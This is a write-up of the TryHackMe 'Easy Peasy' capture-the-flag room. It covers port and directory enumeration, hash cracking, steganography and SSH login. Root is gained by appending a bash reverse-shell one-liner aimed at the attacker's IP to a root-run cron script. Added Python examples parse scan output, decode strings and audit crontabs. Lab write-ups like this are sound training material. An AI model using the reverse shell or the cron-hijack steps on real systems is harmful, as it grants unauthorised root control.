EasyPeasy

Practice using tools such as Nmap and GoBuster to locate a hidden directory to get initial access to a vulnerable machine. Then escalate your privileges through a vulnerable cronjob.

Try this challenge in TryHackMe: Easy Peasy

I tried this easy CTF and below is my thought process on how I answered the questions and some notes for future reference. I got some hints from this Medium walkthrough: TryHackMe: Easy Peasy Write-up by Kevin De Vijlder

Task 1: Enumeration through Nmap

1.1 How many ports are open?

Let's run an nmap scan to check the open ports on the IP assigned to us. Replace 10.10.X.X with the IP given to you.

nmap -sT -p 1-65535 10.10.X.X

-sT (TCP connect scan)

To answer the next two questions, we'll run a version-detection (-sV) nmap scan against the open ports we found:

1.2 What is the version of nginx?

1.3 What is running on the highest port?

nmap -p80,6498,65524 10.10.X.X -sV
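Nmap can write its results in grepable form (-oG), which is handy when you want to answer the three enumeration questions from a file instead of reading the terminal. The script below is an added example, not part of the original write-up: it parses a constructed sample of `nmap -sV -oG -` output (the ports match the walkthrough, but the version strings are made up) and answers "how many ports are open", "what version is nginx" and "what runs on the highest port" programmatically.

```python
import re
from dataclasses import dataclass

# Constructed sample of `nmap -sV -oG -` (grepable) output. The ports match the
# walkthrough, but the service version strings are made up for this example.
SAMPLE_GNMAP = """\
# Nmap scan initiated as: nmap -sV -p80,6498,65524 -oG - 10.10.X.X
Host: 10.10.X.X ()\tStatus: Up
Host: 10.10.X.X ()\tPorts: 80/open/tcp//http//nginx 1.2.3/, 6498/open/tcp//ssh//OpenSSH 4.5.6/, 65524/open/tcp//http//Apache httpd 7.8.9/\tIgnored State: closed (65532)
# Nmap done -- 1 IP address (1 host up) scanned
"""


@dataclass
class PortInfo:
    port: int
    state: str
    proto: str
    service: str
    version: str


def parse_gnmap(text):
    """Return {host: [PortInfo, ...]} parsed from nmap grepable (-oG) output."""
    results = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        host = line.split()[1]
        match = re.search(r"Ports: (.*?)(?:\t|$)", line)
        if not match:
            continue  # "Status: Up" lines carry no port data
        entries = []
        for entry in match.group(1).split(", "):
            # Each entry is port/state/proto/owner/service/rpcinfo/version/
            fields = entry.split("/")
            if len(fields) < 7:
                continue
            entries.append(PortInfo(int(fields[0]), fields[1], fields[2],
                                    fields[4], fields[6]))
        results.setdefault(host, []).extend(entries)
    return results


def open_ports(ports):
    """Open ports only, sorted by port number."""
    return sorted((p for p in ports if p.state == "open"), key=lambda p: p.port)


def highest_open_port(ports):
    return open_ports(ports)[-1]


def find_version(ports, product):
    """Version string of the first open port whose banner starts with `product`."""
    for p in open_ports(ports):
        if p.version.lower().startswith(product.lower()):
            return p.version
    return None


if __name__ == "__main__":
    for host, ports in parse_gnmap(SAMPLE_GNMAP).items():
        opened = open_ports(ports)
        print(f"{host}: {len(opened)} open ports")
        for p in opened:
            print(f"  {p.port}/{p.proto} {p.service:8s} {p.version}")
        print("nginx version:", find_version(ports, "nginx"))
        print("highest port runs:", highest_open_port(ports).service)
```

On a real scan, run `nmap -sV -oG scan.gnmap ...` and pass the file contents to `parse_gnmap` in place of the constructed sample. Note that nmap replaces any "/" inside a version string with "|" in grepable output, which is why splitting each entry on "/" is safe.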

Task 2: Compromising the machine

2.1 Using GoBuster, find flag 1.

Run gobuster for http://10.10.X.X/

gobuster dir -u http://10.10.X.X/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt

We find a /hidden directory. Let's run gobuster against http://10.10.X.X/hidden as well:

gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.X.X/hidden

Go to http://10.10.X.X/hidden/whatever

Copy the hidden hash

To recover the plaintext behind the hash, an online lookup service such as https://hashes.com/en/decrypt/hash gives the fastest result

2.2 Further enumerate the machine, what is flag 2?

Run gobuster for http://10.10.X.X:65524

gobuster dir -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt -u http://10.10.X.X:65524

Check http://10.10.X.X:65524/robots.txt

In the User-Agent field, there’s a hash

To find the type of the hash, use the hash-identifier tool

cd /hash-identifier
python3 hash-id.py <insert hash here>

Look up the MD5 hash with an online MD5 reverse-lookup site
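hash-identifier works mostly from the length and character set of the string, so several algorithms are always possible for a plain hex digest (a 32-character hex string can be MD5, MD4 or NTLM), while modular-crypt strings such as `$6$...` identify their scheme unambiguously. The following is an added example of that heuristic, not the hash-identifier code itself; the sample digests are generated locally with hashlib and are not hashes from the machine.

```python
import hashlib
import re

HEX_RE = re.compile(r"^[0-9a-f]+$")

# Hex digest lengths shared by common algorithms. Like hash-identifier, the
# result is a list of candidates: a 32-hex string could be MD5, MD4 or NTLM.
HEX_DIGEST_CANDIDATES = {
    32: ["MD5", "MD4", "NTLM"],
    40: ["SHA-1", "RIPEMD-160"],
    56: ["SHA-224"],
    64: ["SHA-256", "SHA3-256", "GOST R 34.11-94"],
    96: ["SHA-384"],
    128: ["SHA-512", "SHA3-512", "Whirlpool"],
}

# Modular crypt format prefixes, which identify the scheme unambiguously.
CRYPT_PREFIXES = {
    "$1$": "md5crypt",
    "$apr1$": "Apache md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
}


def identify_hash(value):
    """Return candidate algorithm names for a hash string, most common first."""
    value = value.strip()
    for prefix, name in CRYPT_PREFIXES.items():
        if value.startswith(prefix):
            return [name]
    lowered = value.lower()
    if HEX_RE.match(lowered):
        return list(HEX_DIGEST_CANDIDATES.get(len(lowered), []))
    return []  # neither a crypt string nor a hex digest of a known length


# Constructed samples generated locally, not hashes taken from the machine.
SAMPLE_DIGESTS = {name: hashlib.new(name, b"example").hexdigest()
                  for name in ("md5", "sha1", "sha256", "sha512")}

if __name__ == "__main__":
    for name, digest in SAMPLE_DIGESTS.items():
        print(f"{name:7s} {digest[:16]}... -> {identify_hash(digest)}")
```

The 64-hex entry is the one that matters later in this room: SHA-256 and GOST R 34.11-94 produce digests of the same length, which is why a tool can only list both and the wordlist attack has to be tried with each format.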

2.3 Crack the hash with easypeasy.txt, What is the flag 3?

From our nmap scan, go to http://10.10.X.X:65524

Flag 3 is written in plain sight on the web page

2.4 What is the hidden directory?

When you view the page source of http://10.10.X.X:65524, you'll see a hidden field containing a hash.

We'll use CyberChef to decode it from Base6X (try the Base6X options available in CyberChef)

2.5 Using the wordlist that was provided to you in this task crack the hash what is the password?

When you go to the hidden directory, you’ll see a picture

Save the image with its default name

We'll use steghide to extract the message hidden in the image

steghide --extract -sf binarycodepixabay.jpg

But a passphrase is needed to decrypt this file

Let's view the page source of the image's page for clues. There is indeed a hash there.

Save the hash using the filename hash.txt

nano hash.txt

To crack the hash against the provided wordlist, use John the Ripper with the GOST format

sudo /opt/john/john --wordlist=easypeasy.txt --format=gost hash.txt

2.6 What is the password to login to the machine via SSH?

Going back to steghide, run the extract command again and enter the passphrase we just cracked.

A file secrettext.txt is extracted. View its contents:

cat secrettext.txt

We'll get a username, boring, and a string of binary numbers that needs to be decoded

Use a Binary to Text converter tool online like this:

https://www.rapidtables.com/convert/number/binary-to-ascii.html

2.7 What is the user flag?

From our previous nmap scan, we'll use port 6498 for SSH access

ssh boring@10.10.X.X -p 6498
ls
cat user.txt

From the Hint, we got the term “Rotated”, which suggests that this may be encrypted with ROT13. Using CyberChef, we decrypt the flag.
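Both decoding steps in this task (the binary string from secrettext.txt in 2.6 and the "rotated" user flag in 2.7) can be done offline without CyberChef or a converter website. The code below is an added example, not part of the original write-up; its sample inputs are constructed and are not the machine's actual secret text or flag. It also goes slightly beyond the page by listing all 25 rotations, which is what you want when a hint says only "rotated" and not by how much.

```python
import re

# Constructed sample inputs (not the machine's secrettext.txt contents or flag).
SAMPLE_BINARY = "01101000 01100101 01101100 01101100 01101111"   # "hello"
SAMPLE_ROTATED = "Uryyb, Jbeyq!"                                  # ROT13 of "Hello, World!"


def binary_to_text(binary):
    """Decode a string of 8-bit binary groups to text.

    Whitespace (or any non-0/1 separator) between bytes is ignored, so both
    "01101000 01100101" and "0110100001100101" decode the same way.
    """
    bits = re.sub(r"[^01]", "", binary)
    if not bits or len(bits) % 8:
        raise ValueError("input must contain a whole number of 8-bit groups")
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, len(bits), 8))


def text_to_binary(text):
    """Inverse of binary_to_text, useful for checking the decoder."""
    return " ".join(f"{ord(ch):08b}" for ch in text)


def rot(text, n=13):
    """Rotate letters by n positions, leaving digits and punctuation alone.
    ROT13 is its own inverse: rot(rot(x)) == x."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + n) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + n) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def rot_candidates(text):
    """All 25 non-trivial rotations, for when a hint says only 'rotated'."""
    return {n: rot(text, n) for n in range(1, 26)}


if __name__ == "__main__":
    print(binary_to_text(SAMPLE_BINARY))
    print(rot(SAMPLE_ROTATED))
    for n, candidate in rot_candidates("ebgngrq").items():
        print(f"ROT{n:<2d} {candidate}")
```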

2.8 What is the root flag?

From the description of this room, we are expected to escalate our privileges through a vulnerable cronjob

cat /etc/crontab

The cron job is located in /var/www

cd /var/www
ls -la

We'll see the hidden script .mysecretcronjob.sh, which the crontab entry says runs as root.

cat .mysecretcronjob.sh
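The weakness here is a root cron job whose script lives in a directory a low-privileged user can write to, so anyone who can edit the script gets its contents executed as root on the next run. The script below is an added example of the check a defender (or a pentester writing the report) would run to find that pattern; it is not from the room. It parses a constructed /etc/crontab in the system format and, instead of calling os.stat on a live machine, uses a constructed table of owners and permission bits so it runs offline; `stat_from_fs` shows the real lookup.

```python
import os
import stat
from dataclasses import dataclass

# Constructed sample /etc/crontab (not copied from the machine). The second
# job mirrors the walkthrough: a hidden script under /var/www run as root.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* *     * * *   root    /var/www/.mysecretcronjob.sh
0 3     * * *   root    /usr/local/bin/backup.sh
30 4    * * *   root    /usr/local/bin/rotate.sh
15 5    * * *   backup  /home/backup/sync.sh
"""

# Constructed ownership/permission table standing in for os.stat(), so the
# example runs offline: path -> (owner uid, permission bits). uid 33 is the
# web server user on Debian-based systems; uid 0 is root.
SAMPLE_FILES = {
    "/var/www": (33, 0o755),
    "/var/www/.mysecretcronjob.sh": (33, 0o755),   # owned by a non-root user
    "/usr/local/bin": (0, 0o755),
    "/usr/local/bin/backup.sh": (0, 0o777),        # root-owned but world-writable
    "/usr/local/bin/rotate.sh": (0, 0o755),        # safe: root-owned, owner-writable only
    "/home/backup/sync.sh": (1001, 0o755),         # runs as 'backup', not root
}


@dataclass
class CronJob:
    schedule: str
    user: str
    command: str


def parse_system_crontab(text):
    """Parse /etc/crontab-style lines (five schedule fields, user, command)."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value assignment
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue
        jobs.append(CronJob(" ".join(parts[:5]), parts[5], parts[6]))
    return jobs


def script_paths(command):
    """Absolute paths mentioned in a cron command line."""
    return [tok for tok in command.split() if tok.startswith("/") and len(tok) > 1]


def stat_from_fs(path):
    """Real lookup for a live system: (owner uid, permission bits)."""
    st = os.stat(path)
    return st.st_uid, stat.S_IMODE(st.st_mode)


def audit_crontab(text, files):
    """Flag root cron jobs whose script (or its directory) a non-root user can change."""
    findings = []
    for job in parse_system_crontab(text):
        if job.user != "root":
            continue
        for path in script_paths(job.command):
            info = files.get(path)
            if info is None:
                continue  # not in our table; on a live system use stat_from_fs(path)
            uid, mode = info
            if uid != 0 or mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((path, f"script modifiable by non-root "
                                       f"(owner uid {uid}, mode {oct(mode)})"))
            parent = files.get(os.path.dirname(path))
            if parent and parent[1] & stat.S_IWOTH and not parent[1] & stat.S_ISVTX:
                findings.append((path, "parent directory is world-writable without sticky bit"))
    return findings


if __name__ == "__main__":
    for path, reason in audit_crontab(SAMPLE_CRONTAB, SAMPLE_FILES):
        print(f"[!] {path}: {reason}")
```

The fix the audit points at is the usual one: scripts executed by root's cron should be owned by root, writable only by root, and kept outside directories such as /var/www that a service account or local user can write to.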

We can set up a netcat listener on our machine to catch a reverse shell, since the cronjob runs with root privileges.

nc -lvnp 5556

Let's craft our payload:

Get the bash reverse shell one-liner from pentestmonkey's reverse shell cheat sheet and add it to the end of .mysecretcronjob.sh:

echo "bash -i >& /dev/tcp/10.10.X.X/5556 0>&1" >> .mysecretcronjob.sh

*In place of 10.10.X.X here, use your own attacking machine's IP, and keep port 5556 to match the listener.

Now wait for the cronjob to run; the listener receives a root shell. Then:

cd /root
ls -la

We can see the flag in the .root.txt file.

cat .root.txt
